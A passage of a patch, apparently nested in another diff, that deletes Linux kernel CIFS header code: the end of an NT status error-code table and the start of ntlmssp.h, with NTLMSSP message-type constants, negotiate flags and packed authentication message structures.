+-#define NT_STATUS_BAD_DESCRIPTOR_FORMAT 0xC0000000 | 0x00e7
+-#define NT_STATUS_INVALID_USER_BUFFER 0xC0000000 | 0x00e8
+-#define NT_STATUS_UNEXPECTED_IO_ERROR 0xC0000000 | 0x00e9
+-#define NT_STATUS_UNEXPECTED_MM_CREATE_ERR 0xC0000000 | 0x00ea
+-#define NT_STATUS_UNEXPECTED_MM_MAP_ERROR 0xC0000000 | 0x00eb
+-#define NT_STATUS_UNEXPECTED_MM_EXTEND_ERR 0xC0000000 | 0x00ec
+-#define NT_STATUS_NOT_LOGON_PROCESS 0xC0000000 | 0x00ed
+-#define NT_STATUS_LOGON_SESSION_EXISTS 0xC0000000 | 0x00ee
+-#define NT_STATUS_INVALID_PARAMETER_1 0xC0000000 | 0x00ef
+-#define NT_STATUS_INVALID_PARAMETER_2 0xC0000000 | 0x00f0
+-#define NT_STATUS_INVALID_PARAMETER_3 0xC0000000 | 0x00f1
+-#define NT_STATUS_INVALID_PARAMETER_4 0xC0000000 | 0x00f2
+-#define NT_STATUS_INVALID_PARAMETER_5 0xC0000000 | 0x00f3
+-#define NT_STATUS_INVALID_PARAMETER_6 0xC0000000 | 0x00f4
+-#define NT_STATUS_INVALID_PARAMETER_7 0xC0000000 | 0x00f5
+-#define NT_STATUS_INVALID_PARAMETER_8 0xC0000000 | 0x00f6
+-#define NT_STATUS_INVALID_PARAMETER_9 0xC0000000 | 0x00f7
+-#define NT_STATUS_INVALID_PARAMETER_10 0xC0000000 | 0x00f8
+-#define NT_STATUS_INVALID_PARAMETER_11 0xC0000000 | 0x00f9
+-#define NT_STATUS_INVALID_PARAMETER_12 0xC0000000 | 0x00fa
+-#define NT_STATUS_REDIRECTOR_NOT_STARTED 0xC0000000 | 0x00fb
+-#define NT_STATUS_REDIRECTOR_STARTED 0xC0000000 | 0x00fc
+-#define NT_STATUS_STACK_OVERFLOW 0xC0000000 | 0x00fd
+-#define NT_STATUS_NO_SUCH_PACKAGE 0xC0000000 | 0x00fe
+-#define NT_STATUS_BAD_FUNCTION_TABLE 0xC0000000 | 0x00ff
+-#define NT_STATUS_DIRECTORY_NOT_EMPTY 0xC0000000 | 0x0101
+-#define NT_STATUS_FILE_CORRUPT_ERROR 0xC0000000 | 0x0102
+-#define NT_STATUS_NOT_A_DIRECTORY 0xC0000000 | 0x0103
+-#define NT_STATUS_BAD_LOGON_SESSION_STATE 0xC0000000 | 0x0104
+-#define NT_STATUS_LOGON_SESSION_COLLISION 0xC0000000 | 0x0105
+-#define NT_STATUS_NAME_TOO_LONG 0xC0000000 | 0x0106
+-#define NT_STATUS_FILES_OPEN 0xC0000000 | 0x0107
+-#define NT_STATUS_CONNECTION_IN_USE 0xC0000000 | 0x0108
+-#define NT_STATUS_MESSAGE_NOT_FOUND 0xC0000000 | 0x0109
+-#define NT_STATUS_PROCESS_IS_TERMINATING 0xC0000000 | 0x010a
+-#define NT_STATUS_INVALID_LOGON_TYPE 0xC0000000 | 0x010b
+-#define NT_STATUS_NO_GUID_TRANSLATION 0xC0000000 | 0x010c
+-#define NT_STATUS_CANNOT_IMPERSONATE 0xC0000000 | 0x010d
+-#define NT_STATUS_IMAGE_ALREADY_LOADED 0xC0000000 | 0x010e
+-#define NT_STATUS_ABIOS_NOT_PRESENT 0xC0000000 | 0x010f
+-#define NT_STATUS_ABIOS_LID_NOT_EXIST 0xC0000000 | 0x0110
+-#define NT_STATUS_ABIOS_LID_ALREADY_OWNED 0xC0000000 | 0x0111
+-#define NT_STATUS_ABIOS_NOT_LID_OWNER 0xC0000000 | 0x0112
+-#define NT_STATUS_ABIOS_INVALID_COMMAND 0xC0000000 | 0x0113
+-#define NT_STATUS_ABIOS_INVALID_LID 0xC0000000 | 0x0114
+-#define NT_STATUS_ABIOS_SELECTOR_NOT_AVAILABLE 0xC0000000 | 0x0115
+-#define NT_STATUS_ABIOS_INVALID_SELECTOR 0xC0000000 | 0x0116
+-#define NT_STATUS_NO_LDT 0xC0000000 | 0x0117
+-#define NT_STATUS_INVALID_LDT_SIZE 0xC0000000 | 0x0118
+-#define NT_STATUS_INVALID_LDT_OFFSET 0xC0000000 | 0x0119
+-#define NT_STATUS_INVALID_LDT_DESCRIPTOR 0xC0000000 | 0x011a
+-#define NT_STATUS_INVALID_IMAGE_NE_FORMAT 0xC0000000 | 0x011b
+-#define NT_STATUS_RXACT_INVALID_STATE 0xC0000000 | 0x011c
+-#define NT_STATUS_RXACT_COMMIT_FAILURE 0xC0000000 | 0x011d
+-#define NT_STATUS_MAPPED_FILE_SIZE_ZERO 0xC0000000 | 0x011e
+-#define NT_STATUS_TOO_MANY_OPENED_FILES 0xC0000000 | 0x011f
+-#define NT_STATUS_CANCELLED 0xC0000000 | 0x0120
+-#define NT_STATUS_CANNOT_DELETE 0xC0000000 | 0x0121
+-#define NT_STATUS_INVALID_COMPUTER_NAME 0xC0000000 | 0x0122
+-#define NT_STATUS_FILE_DELETED 0xC0000000 | 0x0123
+-#define NT_STATUS_SPECIAL_ACCOUNT 0xC0000000 | 0x0124
+-#define NT_STATUS_SPECIAL_GROUP 0xC0000000 | 0x0125
+-#define NT_STATUS_SPECIAL_USER 0xC0000000 | 0x0126
+-#define NT_STATUS_MEMBERS_PRIMARY_GROUP 0xC0000000 | 0x0127
+-#define NT_STATUS_FILE_CLOSED 0xC0000000 | 0x0128
+-#define NT_STATUS_TOO_MANY_THREADS 0xC0000000 | 0x0129
+-#define NT_STATUS_THREAD_NOT_IN_PROCESS 0xC0000000 | 0x012a
+-#define NT_STATUS_TOKEN_ALREADY_IN_USE 0xC0000000 | 0x012b
+-#define NT_STATUS_PAGEFILE_QUOTA_EXCEEDED 0xC0000000 | 0x012c
+-#define NT_STATUS_COMMITMENT_LIMIT 0xC0000000 | 0x012d
+-#define NT_STATUS_INVALID_IMAGE_LE_FORMAT 0xC0000000 | 0x012e
+-#define NT_STATUS_INVALID_IMAGE_NOT_MZ 0xC0000000 | 0x012f
+-#define NT_STATUS_INVALID_IMAGE_PROTECT 0xC0000000 | 0x0130
+-#define NT_STATUS_INVALID_IMAGE_WIN_16 0xC0000000 | 0x0131
+-#define NT_STATUS_LOGON_SERVER_CONFLICT 0xC0000000 | 0x0132
+-#define NT_STATUS_TIME_DIFFERENCE_AT_DC 0xC0000000 | 0x0133
+-#define NT_STATUS_SYNCHRONIZATION_REQUIRED 0xC0000000 | 0x0134
+-#define NT_STATUS_DLL_NOT_FOUND 0xC0000000 | 0x0135
+-#define NT_STATUS_OPEN_FAILED 0xC0000000 | 0x0136
+-#define NT_STATUS_IO_PRIVILEGE_FAILED 0xC0000000 | 0x0137
+-#define NT_STATUS_ORDINAL_NOT_FOUND 0xC0000000 | 0x0138
+-#define NT_STATUS_ENTRYPOINT_NOT_FOUND 0xC0000000 | 0x0139
+-#define NT_STATUS_CONTROL_C_EXIT 0xC0000000 | 0x013a
+-#define NT_STATUS_LOCAL_DISCONNECT 0xC0000000 | 0x013b
+-#define NT_STATUS_REMOTE_DISCONNECT 0xC0000000 | 0x013c
+-#define NT_STATUS_REMOTE_RESOURCES 0xC0000000 | 0x013d
+-#define NT_STATUS_LINK_FAILED 0xC0000000 | 0x013e
+-#define NT_STATUS_LINK_TIMEOUT 0xC0000000 | 0x013f
+-#define NT_STATUS_INVALID_CONNECTION 0xC0000000 | 0x0140
+-#define NT_STATUS_INVALID_ADDRESS 0xC0000000 | 0x0141
+-#define NT_STATUS_DLL_INIT_FAILED 0xC0000000 | 0x0142
+-#define NT_STATUS_MISSING_SYSTEMFILE 0xC0000000 | 0x0143
+-#define NT_STATUS_UNHANDLED_EXCEPTION 0xC0000000 | 0x0144
+-#define NT_STATUS_APP_INIT_FAILURE 0xC0000000 | 0x0145
+-#define NT_STATUS_PAGEFILE_CREATE_FAILED 0xC0000000 | 0x0146
+-#define NT_STATUS_NO_PAGEFILE 0xC0000000 | 0x0147
+-#define NT_STATUS_INVALID_LEVEL 0xC0000000 | 0x0148
+-#define NT_STATUS_WRONG_PASSWORD_CORE 0xC0000000 | 0x0149
+-#define NT_STATUS_ILLEGAL_FLOAT_CONTEXT 0xC0000000 | 0x014a
+-#define NT_STATUS_PIPE_BROKEN 0xC0000000 | 0x014b
+-#define NT_STATUS_REGISTRY_CORRUPT 0xC0000000 | 0x014c
+-#define NT_STATUS_REGISTRY_IO_FAILED 0xC0000000 | 0x014d
+-#define NT_STATUS_NO_EVENT_PAIR 0xC0000000 | 0x014e
+-#define NT_STATUS_UNRECOGNIZED_VOLUME 0xC0000000 | 0x014f
+-#define NT_STATUS_SERIAL_NO_DEVICE_INITED 0xC0000000 | 0x0150
+-#define NT_STATUS_NO_SUCH_ALIAS 0xC0000000 | 0x0151
+-#define NT_STATUS_MEMBER_NOT_IN_ALIAS 0xC0000000 | 0x0152
+-#define NT_STATUS_MEMBER_IN_ALIAS 0xC0000000 | 0x0153
+-#define NT_STATUS_ALIAS_EXISTS 0xC0000000 | 0x0154
+-#define NT_STATUS_LOGON_NOT_GRANTED 0xC0000000 | 0x0155
+-#define NT_STATUS_TOO_MANY_SECRETS 0xC0000000 | 0x0156
+-#define NT_STATUS_SECRET_TOO_LONG 0xC0000000 | 0x0157
+-#define NT_STATUS_INTERNAL_DB_ERROR 0xC0000000 | 0x0158
+-#define NT_STATUS_FULLSCREEN_MODE 0xC0000000 | 0x0159
+-#define NT_STATUS_TOO_MANY_CONTEXT_IDS 0xC0000000 | 0x015a
+-#define NT_STATUS_LOGON_TYPE_NOT_GRANTED 0xC0000000 | 0x015b
+-#define NT_STATUS_NOT_REGISTRY_FILE 0xC0000000 | 0x015c
+-#define NT_STATUS_NT_CROSS_ENCRYPTION_REQUIRED 0xC0000000 | 0x015d
+-#define NT_STATUS_DOMAIN_CTRLR_CONFIG_ERROR 0xC0000000 | 0x015e
+-#define NT_STATUS_FT_MISSING_MEMBER 0xC0000000 | 0x015f
+-#define NT_STATUS_ILL_FORMED_SERVICE_ENTRY 0xC0000000 | 0x0160
+-#define NT_STATUS_ILLEGAL_CHARACTER 0xC0000000 | 0x0161
+-#define NT_STATUS_UNMAPPABLE_CHARACTER 0xC0000000 | 0x0162
+-#define NT_STATUS_UNDEFINED_CHARACTER 0xC0000000 | 0x0163
+-#define NT_STATUS_FLOPPY_VOLUME 0xC0000000 | 0x0164
+-#define NT_STATUS_FLOPPY_ID_MARK_NOT_FOUND 0xC0000000 | 0x0165
+-#define NT_STATUS_FLOPPY_WRONG_CYLINDER 0xC0000000 | 0x0166
+-#define NT_STATUS_FLOPPY_UNKNOWN_ERROR 0xC0000000 | 0x0167
+-#define NT_STATUS_FLOPPY_BAD_REGISTERS 0xC0000000 | 0x0168
+-#define NT_STATUS_DISK_RECALIBRATE_FAILED 0xC0000000 | 0x0169
+-#define NT_STATUS_DISK_OPERATION_FAILED 0xC0000000 | 0x016a
+-#define NT_STATUS_DISK_RESET_FAILED 0xC0000000 | 0x016b
+-#define NT_STATUS_SHARED_IRQ_BUSY 0xC0000000 | 0x016c
+-#define NT_STATUS_FT_ORPHANING 0xC0000000 | 0x016d
+-#define NT_STATUS_PARTITION_FAILURE 0xC0000000 | 0x0172
+-#define NT_STATUS_INVALID_BLOCK_LENGTH 0xC0000000 | 0x0173
+-#define NT_STATUS_DEVICE_NOT_PARTITIONED 0xC0000000 | 0x0174
+-#define NT_STATUS_UNABLE_TO_LOCK_MEDIA 0xC0000000 | 0x0175
+-#define NT_STATUS_UNABLE_TO_UNLOAD_MEDIA 0xC0000000 | 0x0176
+-#define NT_STATUS_EOM_OVERFLOW 0xC0000000 | 0x0177
+-#define NT_STATUS_NO_MEDIA 0xC0000000 | 0x0178
+-#define NT_STATUS_NO_SUCH_MEMBER 0xC0000000 | 0x017a
+-#define NT_STATUS_INVALID_MEMBER 0xC0000000 | 0x017b
+-#define NT_STATUS_KEY_DELETED 0xC0000000 | 0x017c
+-#define NT_STATUS_NO_LOG_SPACE 0xC0000000 | 0x017d
+-#define NT_STATUS_TOO_MANY_SIDS 0xC0000000 | 0x017e
+-#define NT_STATUS_LM_CROSS_ENCRYPTION_REQUIRED 0xC0000000 | 0x017f
+-#define NT_STATUS_KEY_HAS_CHILDREN 0xC0000000 | 0x0180
+-#define NT_STATUS_CHILD_MUST_BE_VOLATILE 0xC0000000 | 0x0181
+-#define NT_STATUS_DEVICE_CONFIGURATION_ERROR 0xC0000000 | 0x0182
+-#define NT_STATUS_DRIVER_INTERNAL_ERROR 0xC0000000 | 0x0183
+-#define NT_STATUS_INVALID_DEVICE_STATE 0xC0000000 | 0x0184
+-#define NT_STATUS_IO_DEVICE_ERROR 0xC0000000 | 0x0185
+-#define NT_STATUS_DEVICE_PROTOCOL_ERROR 0xC0000000 | 0x0186
+-#define NT_STATUS_BACKUP_CONTROLLER 0xC0000000 | 0x0187
+-#define NT_STATUS_LOG_FILE_FULL 0xC0000000 | 0x0188
+-#define NT_STATUS_TOO_LATE 0xC0000000 | 0x0189
+-#define NT_STATUS_NO_TRUST_LSA_SECRET 0xC0000000 | 0x018a
+-#define NT_STATUS_NO_TRUST_SAM_ACCOUNT 0xC0000000 | 0x018b
+-#define NT_STATUS_TRUSTED_DOMAIN_FAILURE 0xC0000000 | 0x018c
+-#define NT_STATUS_TRUSTED_RELATIONSHIP_FAILURE 0xC0000000 | 0x018d
+-#define NT_STATUS_EVENTLOG_FILE_CORRUPT 0xC0000000 | 0x018e
+-#define NT_STATUS_EVENTLOG_CANT_START 0xC0000000 | 0x018f
+-#define NT_STATUS_TRUST_FAILURE 0xC0000000 | 0x0190
+-#define NT_STATUS_MUTANT_LIMIT_EXCEEDED 0xC0000000 | 0x0191
+-#define NT_STATUS_NETLOGON_NOT_STARTED 0xC0000000 | 0x0192
+-#define NT_STATUS_ACCOUNT_EXPIRED 0xC0000000 | 0x0193
+-#define NT_STATUS_POSSIBLE_DEADLOCK 0xC0000000 | 0x0194
+-#define NT_STATUS_NETWORK_CREDENTIAL_CONFLICT 0xC0000000 | 0x0195
+-#define NT_STATUS_REMOTE_SESSION_LIMIT 0xC0000000 | 0x0196
+-#define NT_STATUS_EVENTLOG_FILE_CHANGED 0xC0000000 | 0x0197
+-#define NT_STATUS_NOLOGON_INTERDOMAIN_TRUST_ACCOUNT 0xC0000000 | 0x0198
+-#define NT_STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT 0xC0000000 | 0x0199
+-#define NT_STATUS_NOLOGON_SERVER_TRUST_ACCOUNT 0xC0000000 | 0x019a
+-#define NT_STATUS_DOMAIN_TRUST_INCONSISTENT 0xC0000000 | 0x019b
+-#define NT_STATUS_FS_DRIVER_REQUIRED 0xC0000000 | 0x019c
+-#define NT_STATUS_NO_USER_SESSION_KEY 0xC0000000 | 0x0202
+-#define NT_STATUS_USER_SESSION_DELETED 0xC0000000 | 0x0203
+-#define NT_STATUS_RESOURCE_LANG_NOT_FOUND 0xC0000000 | 0x0204
+-#define NT_STATUS_INSUFF_SERVER_RESOURCES 0xC0000000 | 0x0205
+-#define NT_STATUS_INVALID_BUFFER_SIZE 0xC0000000 | 0x0206
+-#define NT_STATUS_INVALID_ADDRESS_COMPONENT 0xC0000000 | 0x0207
+-#define NT_STATUS_INVALID_ADDRESS_WILDCARD 0xC0000000 | 0x0208
+-#define NT_STATUS_TOO_MANY_ADDRESSES 0xC0000000 | 0x0209
+-#define NT_STATUS_ADDRESS_ALREADY_EXISTS 0xC0000000 | 0x020a
+-#define NT_STATUS_ADDRESS_CLOSED 0xC0000000 | 0x020b
+-#define NT_STATUS_CONNECTION_DISCONNECTED 0xC0000000 | 0x020c
+-#define NT_STATUS_CONNECTION_RESET 0xC0000000 | 0x020d
+-#define NT_STATUS_TOO_MANY_NODES 0xC0000000 | 0x020e
+-#define NT_STATUS_TRANSACTION_ABORTED 0xC0000000 | 0x020f
+-#define NT_STATUS_TRANSACTION_TIMED_OUT 0xC0000000 | 0x0210
+-#define NT_STATUS_TRANSACTION_NO_RELEASE 0xC0000000 | 0x0211
+-#define NT_STATUS_TRANSACTION_NO_MATCH 0xC0000000 | 0x0212
+-#define NT_STATUS_TRANSACTION_RESPONDED 0xC0000000 | 0x0213
+-#define NT_STATUS_TRANSACTION_INVALID_ID 0xC0000000 | 0x0214
+-#define NT_STATUS_TRANSACTION_INVALID_TYPE 0xC0000000 | 0x0215
+-#define NT_STATUS_NOT_SERVER_SESSION 0xC0000000 | 0x0216
+-#define NT_STATUS_NOT_CLIENT_SESSION 0xC0000000 | 0x0217
+-#define NT_STATUS_CANNOT_LOAD_REGISTRY_FILE 0xC0000000 | 0x0218
+-#define NT_STATUS_DEBUG_ATTACH_FAILED 0xC0000000 | 0x0219
+-#define NT_STATUS_SYSTEM_PROCESS_TERMINATED 0xC0000000 | 0x021a
+-#define NT_STATUS_DATA_NOT_ACCEPTED 0xC0000000 | 0x021b
+-#define NT_STATUS_NO_BROWSER_SERVERS_FOUND 0xC0000000 | 0x021c
+-#define NT_STATUS_VDM_HARD_ERROR 0xC0000000 | 0x021d
+-#define NT_STATUS_DRIVER_CANCEL_TIMEOUT 0xC0000000 | 0x021e
+-#define NT_STATUS_REPLY_MESSAGE_MISMATCH 0xC0000000 | 0x021f
+-#define NT_STATUS_MAPPED_ALIGNMENT 0xC0000000 | 0x0220
+-#define NT_STATUS_IMAGE_CHECKSUM_MISMATCH 0xC0000000 | 0x0221
+-#define NT_STATUS_LOST_WRITEBEHIND_DATA 0xC0000000 | 0x0222
+-#define NT_STATUS_CLIENT_SERVER_PARAMETERS_INVALID 0xC0000000 | 0x0223
+-#define NT_STATUS_PASSWORD_MUST_CHANGE 0xC0000000 | 0x0224
+-#define NT_STATUS_NOT_FOUND 0xC0000000 | 0x0225
+-#define NT_STATUS_NOT_TINY_STREAM 0xC0000000 | 0x0226
+-#define NT_STATUS_RECOVERY_FAILURE 0xC0000000 | 0x0227
+-#define NT_STATUS_STACK_OVERFLOW_READ 0xC0000000 | 0x0228
+-#define NT_STATUS_FAIL_CHECK 0xC0000000 | 0x0229
+-#define NT_STATUS_DUPLICATE_OBJECTID 0xC0000000 | 0x022a
+-#define NT_STATUS_OBJECTID_EXISTS 0xC0000000 | 0x022b
+-#define NT_STATUS_CONVERT_TO_LARGE 0xC0000000 | 0x022c
+-#define NT_STATUS_RETRY 0xC0000000 | 0x022d
+-#define NT_STATUS_FOUND_OUT_OF_SCOPE 0xC0000000 | 0x022e
+-#define NT_STATUS_ALLOCATE_BUCKET 0xC0000000 | 0x022f
+-#define NT_STATUS_PROPSET_NOT_FOUND 0xC0000000 | 0x0230
+-#define NT_STATUS_MARSHALL_OVERFLOW 0xC0000000 | 0x0231
+-#define NT_STATUS_INVALID_VARIANT 0xC0000000 | 0x0232
+-#define NT_STATUS_DOMAIN_CONTROLLER_NOT_FOUND 0xC0000000 | 0x0233
+-#define NT_STATUS_ACCOUNT_LOCKED_OUT 0xC0000000 | 0x0234
+-#define NT_STATUS_HANDLE_NOT_CLOSABLE 0xC0000000 | 0x0235
+-#define NT_STATUS_CONNECTION_REFUSED 0xC0000000 | 0x0236
+-#define NT_STATUS_GRACEFUL_DISCONNECT 0xC0000000 | 0x0237
+-#define NT_STATUS_ADDRESS_ALREADY_ASSOCIATED 0xC0000000 | 0x0238
+-#define NT_STATUS_ADDRESS_NOT_ASSOCIATED 0xC0000000 | 0x0239
+-#define NT_STATUS_CONNECTION_INVALID 0xC0000000 | 0x023a
+-#define NT_STATUS_CONNECTION_ACTIVE 0xC0000000 | 0x023b
+-#define NT_STATUS_NETWORK_UNREACHABLE 0xC0000000 | 0x023c
+-#define NT_STATUS_HOST_UNREACHABLE 0xC0000000 | 0x023d
+-#define NT_STATUS_PROTOCOL_UNREACHABLE 0xC0000000 | 0x023e
+-#define NT_STATUS_PORT_UNREACHABLE 0xC0000000 | 0x023f
+-#define NT_STATUS_REQUEST_ABORTED 0xC0000000 | 0x0240
+-#define NT_STATUS_CONNECTION_ABORTED 0xC0000000 | 0x0241
+-#define NT_STATUS_BAD_COMPRESSION_BUFFER 0xC0000000 | 0x0242
+-#define NT_STATUS_USER_MAPPED_FILE 0xC0000000 | 0x0243
+-#define NT_STATUS_AUDIT_FAILED 0xC0000000 | 0x0244
+-#define NT_STATUS_TIMER_RESOLUTION_NOT_SET 0xC0000000 | 0x0245
+-#define NT_STATUS_CONNECTION_COUNT_LIMIT 0xC0000000 | 0x0246
+-#define NT_STATUS_LOGIN_TIME_RESTRICTION 0xC0000000 | 0x0247
+-#define NT_STATUS_LOGIN_WKSTA_RESTRICTION 0xC0000000 | 0x0248
+-#define NT_STATUS_IMAGE_MP_UP_MISMATCH 0xC0000000 | 0x0249
+-#define NT_STATUS_INSUFFICIENT_LOGON_INFO 0xC0000000 | 0x0250
+-#define NT_STATUS_BAD_DLL_ENTRYPOINT 0xC0000000 | 0x0251
+-#define NT_STATUS_BAD_SERVICE_ENTRYPOINT 0xC0000000 | 0x0252
+-#define NT_STATUS_LPC_REPLY_LOST 0xC0000000 | 0x0253
+-#define NT_STATUS_IP_ADDRESS_CONFLICT1 0xC0000000 | 0x0254
+-#define NT_STATUS_IP_ADDRESS_CONFLICT2 0xC0000000 | 0x0255
+-#define NT_STATUS_REGISTRY_QUOTA_LIMIT 0xC0000000 | 0x0256
+-#define NT_STATUS_PATH_NOT_COVERED 0xC0000000 | 0x0257
+-#define NT_STATUS_NO_CALLBACK_ACTIVE 0xC0000000 | 0x0258
+-#define NT_STATUS_LICENSE_QUOTA_EXCEEDED 0xC0000000 | 0x0259
+-#define NT_STATUS_PWD_TOO_SHORT 0xC0000000 | 0x025a
+-#define NT_STATUS_PWD_TOO_RECENT 0xC0000000 | 0x025b
+-#define NT_STATUS_PWD_HISTORY_CONFLICT 0xC0000000 | 0x025c
+-#define NT_STATUS_PLUGPLAY_NO_DEVICE 0xC0000000 | 0x025e
+-#define NT_STATUS_UNSUPPORTED_COMPRESSION 0xC0000000 | 0x025f
+-#define NT_STATUS_INVALID_HW_PROFILE 0xC0000000 | 0x0260
+-#define NT_STATUS_INVALID_PLUGPLAY_DEVICE_PATH 0xC0000000 | 0x0261
+-#define NT_STATUS_DRIVER_ORDINAL_NOT_FOUND 0xC0000000 | 0x0262
+-#define NT_STATUS_DRIVER_ENTRYPOINT_NOT_FOUND 0xC0000000 | 0x0263
+-#define NT_STATUS_RESOURCE_NOT_OWNED 0xC0000000 | 0x0264
+-#define NT_STATUS_TOO_MANY_LINKS 0xC0000000 | 0x0265
+-#define NT_STATUS_QUOTA_LIST_INCONSISTENT 0xC0000000 | 0x0266
+-#define NT_STATUS_FILE_IS_OFFLINE 0xC0000000 | 0x0267
+-#define NT_STATUS_NO_SUCH_JOB 0xC0000000 | 0xEDE	/* scheduler */
+-
+-#endif				/* _NTERR_H */
+diff --git a/fs/cifs/ntlmssp.h b/fs/cifs/ntlmssp.h
+deleted file mode 100644
+index 55758b9ec877e..0000000000000
+--- a/fs/cifs/ntlmssp.h
++++ /dev/null
+@@ -1,157 +0,0 @@
+-/* SPDX-License-Identifier: LGPL-2.1 */
+-/*
+- *
+- *   Copyright (c) International Business Machines  Corp., 2002,2007
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- *
+- */
+-
+-#define NTLMSSP_SIGNATURE "NTLMSSP"
+-/* Message Types */
+-#define NtLmNegotiate     cpu_to_le32(1)
+-#define NtLmChallenge     cpu_to_le32(2)
+-#define NtLmAuthenticate  cpu_to_le32(3)
+-#define UnknownMessage    cpu_to_le32(8)
+-
+-/* Negotiate Flags */
+-#define NTLMSSP_NEGOTIATE_UNICODE         0x01 /* Text strings are unicode */
+-#define NTLMSSP_NEGOTIATE_OEM             0x02 /* Text strings are in OEM */
+-#define NTLMSSP_REQUEST_TARGET            0x04 /* Srv returns its auth realm */
+-/* define reserved9                       0x08 */
+-#define NTLMSSP_NEGOTIATE_SIGN          0x0010 /* Request signing capability */
+-#define NTLMSSP_NEGOTIATE_SEAL          0x0020 /* Request confidentiality */
+-#define NTLMSSP_NEGOTIATE_DGRAM         0x0040
+-#define NTLMSSP_NEGOTIATE_LM_KEY        0x0080 /* Use LM session key */
+-/* defined reserved 8                   0x0100 */
+-#define NTLMSSP_NEGOTIATE_NTLM          0x0200 /* NTLM authentication */
+-#define NTLMSSP_NEGOTIATE_NT_ONLY       0x0400 /* Lanman not allowed */
+-#define NTLMSSP_ANONYMOUS               0x0800
+-#define NTLMSSP_NEGOTIATE_DOMAIN_SUPPLIED 0x1000 /* reserved6 */
+-#define NTLMSSP_NEGOTIATE_WORKSTATION_SUPPLIED 0x2000
+-#define NTLMSSP_NEGOTIATE_LOCAL_CALL    0x4000 /* client/server same machine */
+-#define NTLMSSP_NEGOTIATE_ALWAYS_SIGN   0x8000 /* Sign. All security levels  */
+-#define NTLMSSP_TARGET_TYPE_DOMAIN     0x10000
+-#define NTLMSSP_TARGET_TYPE_SERVER     0x20000
+-#define NTLMSSP_TARGET_TYPE_SHARE      0x40000
+-#define NTLMSSP_NEGOTIATE_EXTENDED_SEC 0x80000 /* NB:not related to NTLMv2 pwd*/
+-/* #define NTLMSSP_REQUEST_INIT_RESP     0x100000 */
+-#define NTLMSSP_NEGOTIATE_IDENTIFY    0x100000
+-#define NTLMSSP_REQUEST_ACCEPT_RESP   0x200000 /* reserved5 */
+-#define NTLMSSP_REQUEST_NON_NT_KEY    0x400000
+-#define NTLMSSP_NEGOTIATE_TARGET_INFO 0x800000
+-/* #define reserved4                 0x1000000 */
+-#define NTLMSSP_NEGOTIATE_VERSION    0x2000000 /* we only set for SMB2+ */
+-/* #define reserved3                 0x4000000 */
+-/* #define reserved2                 0x8000000 */
+-/* #define reserved1                0x10000000 */
+-#define NTLMSSP_NEGOTIATE_128       0x20000000
+-#define NTLMSSP_NEGOTIATE_KEY_XCH   0x40000000
+-#define NTLMSSP_NEGOTIATE_56        0x80000000
+-
+-/* Define AV Pair Field IDs */
+-enum av_field_type {
+-	NTLMSSP_AV_EOL = 0,
+-	NTLMSSP_AV_NB_COMPUTER_NAME,
+-	NTLMSSP_AV_NB_DOMAIN_NAME,
+-	NTLMSSP_AV_DNS_COMPUTER_NAME,
+-	NTLMSSP_AV_DNS_DOMAIN_NAME,
+-	NTLMSSP_AV_DNS_TREE_NAME,
+-	NTLMSSP_AV_FLAGS,
+-	NTLMSSP_AV_TIMESTAMP,
+-	NTLMSSP_AV_RESTRICTION,
+-	NTLMSSP_AV_TARGET_NAME,
+-	NTLMSSP_AV_CHANNEL_BINDINGS
+-};
+-
+-/* Although typedefs are not commonly used for structure definitions */
+-/* in the Linux kernel, in this particular case they are useful      */
+-/* to more closely match the standards document for NTLMSSP from     */
+-/* OpenGroup and to make the code more closely match the standard in */
+-/* appearance */
+-
+-typedef struct _SECURITY_BUFFER {
+-	__le16 Length;
+-	__le16 MaximumLength;
+-	__le32 BufferOffset;	/* offset to buffer */
+-} __attribute__((packed)) SECURITY_BUFFER;
+-
+-typedef struct _NEGOTIATE_MESSAGE {
+-	__u8 Signature[sizeof(NTLMSSP_SIGNATURE)];
+-	__le32 MessageType;     /* NtLmNegotiate = 1 */
+-	__le32 NegotiateFlags;
+-	SECURITY_BUFFER DomainName;	/* RFC 1001 style and ASCII */
+-	SECURITY_BUFFER WorkstationName;	/* RFC 1001 and ASCII */
+-	/* SECURITY_BUFFER for version info not present since we
+-	   do not set the version-is-present flag */
+-	char DomainString[0];
+-	/* followed by WorkstationString */
+-} __attribute__((packed)) NEGOTIATE_MESSAGE, *PNEGOTIATE_MESSAGE;
+-
+-#define NTLMSSP_REVISION_W2K3 0x0F
+-
+-/* See MS-NLMP section 2.2.2.10 */
+-struct ntlmssp_version {
+-	__u8	ProductMajorVersion;
+-	__u8	ProductMinorVersion;
+-	__le16	ProductBuild; /* we send the cifs.ko module version here */
+-	__u8	Reserved[3];
+-	__u8	NTLMRevisionCurrent; /* currently 0x0F */
+-} __packed;
+-
+-/* see MS-NLMP section 2.2.1.1 */
+-struct negotiate_message {
+-	__u8 Signature[sizeof(NTLMSSP_SIGNATURE)];
+-	__le32 MessageType;     /* NtLmNegotiate = 1 */
+-	__le32 NegotiateFlags;
+-	SECURITY_BUFFER DomainName;	/* RFC 1001 style and ASCII */
+-	SECURITY_BUFFER WorkstationName;	/* RFC 1001 and ASCII */
+-	struct	ntlmssp_version Version;
+-	/* SECURITY_BUFFER */
+-	char DomainString[];
+-	/* followed by WorkstationString */
+-} __packed;
+-
+-typedef struct _CHALLENGE_MESSAGE {
+-	__u8 Signature[sizeof(NTLMSSP_SIGNATURE)];
+-	__le32 MessageType;   /* NtLmChallenge = 2 */
+-	SECURITY_BUFFER TargetName;
+-	__le32 NegotiateFlags;
+-	__u8 Challenge[CIFS_CRYPTO_KEY_SIZE];
+-	__u8 Reserved[8];
+-	SECURITY_BUFFER TargetInfoArray;
+-	/* SECURITY_BUFFER for version info not present since we
+-	   do not set the version-is-present flag */
+-} __attribute__((packed)) CHALLENGE_MESSAGE, *PCHALLENGE_MESSAGE;
+-
+-typedef struct _AUTHENTICATE_MESSAGE {
+-	__u8 Signature[sizeof(NTLMSSP_SIGNATURE)];
+-	__le32 MessageType;  /* NtLmAuthenticate = 3 */
+-	SECURITY_BUFFER LmChallengeResponse;
+-	SECURITY_BUFFER NtChallengeResponse;
+-	SECURITY_BUFFER DomainName;
+-	SECURITY_BUFFER UserName;
+-	SECURITY_BUFFER WorkstationName;
+-	SECURITY_BUFFER SessionKey;
+-	__le32 NegotiateFlags;
+-	/* SECURITY_BUFFER for version info not present since we
+-	   do not set the version-is-present flag */
+-	char UserString[0];
+-} __attribute__((packed)) AUTHENTICATE_MESSAGE, *PAUTHENTICATE_MESSAGE;
+-
+-/*
+- * Size of the session key (crypto key encrypted with the password)
